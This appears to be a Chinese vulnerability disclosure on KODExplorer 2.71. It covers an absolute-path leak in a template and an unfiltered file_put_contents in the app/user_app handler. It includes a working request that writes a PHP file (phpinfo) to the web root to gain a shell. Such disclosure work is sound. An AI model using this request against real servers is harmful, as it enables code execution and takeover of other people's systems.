先爆一颗信息泄露,你的绝对路径泄露了。。。我也是一个个文件看过来的


在controller\app.class.php中
 

public function index() { $this->display(TEMPLATE.'app/index.php'); }



跟踪父类Controller

protected function display($tpl_file){ global $L,$LNG; //var_dump($this->values);exit(); extract($this->values); require($this->tpl.$tpl_file); }



看看他包含的模板吧!

你找下templeate/index.php中

<script src="<?php echo STATIC_PATH;?>js/lib/seajs/sea.js"></script> <script type="text/javascript"> var LNG = <?php echo json_encode($L);?>; var G = { is_root : <?php echo $GLOBALS['is_root'];?>, web_root : "<?php echo $GLOBALS['web_root'];?>", web_host : "<?php echo HOST;?>", static_path : "<?php echo STATIC_PATH;?>", basic_path : "<?php echo BASIC_PATH;?>", version : "<?php echo KOD_VERSION;?>" };



其中的

web_host : "<?php echo HOST;?>", static_path : "<?php echo STATIC_PATH;?>", basic_path : "<?php echo BASIC_PATH;?>", version : "<?php echo KOD_VERSION;?>"




看看本地的截图

芒果云KODExlporer信息泄露+任意命令执行getshell(一)


芒果云KODExlporer信息泄露+任意命令执行getshell(一)

看到了么?

web_root : "E:/wwwroot/", web_host : "https://localhost/", static_path : "./static/", basic_path : "E:/wwwroot/www/", version : "2.71"


看getshell吧!

分给起。。。不然到时候给你爆更多。。。


0x02 getshell

看你的第二个方法 public function user_app() { //phpinfo(); //var_dump($this->in['path']);exit(); $path = _DIR($this->in['path']); //echo $path."<br/>"; if (isset($this->in['action']) && $this->in['action'] == 'add'){ $path .= '.oexe'; } $data = json_decode(rawurldecode($this->in['data']),true); unset($data['name']);unset($data['desc']);unset($data['group']); $res = file_put_contents($path, json_encode($data)); show_json($this->L['success']); }


这里$path 我也就不解释怎么来的了,厂商你懂。。。我就get过来吧,方便点

$data = json_decode(rawurldecode($this->in['data']),true); unset($data['name']);unset($data['desc']);unset($data['group']); $res = file_put_contents($path, json_encode($data));

看到没?

直接$this->in['data']过来的数据?? 有过滤吗? 直接rawurldecode ,然后json_decode然后删除几个数组,直接写文件。。。你考虑过你的用户菊花疼吗?

我给你来写个文件试试。。。

https://localhost/www/index.php?app/user_app&path=fuck.php&data={"name":"1","desc":"2","group":"3","0":"<?php phpinfo();?>"}

我也不解释了。。。厂商你这么牛逼,你懂的。。。。

直接写根目录了。。。。

看截图

芒果云KODExlporer信息泄露+任意命令执行getshell(一)

芒果云KODExlporer信息泄露+任意命令执行getshell(一)

芒果云KODExlporer信息泄露+任意命令执行getshell(一)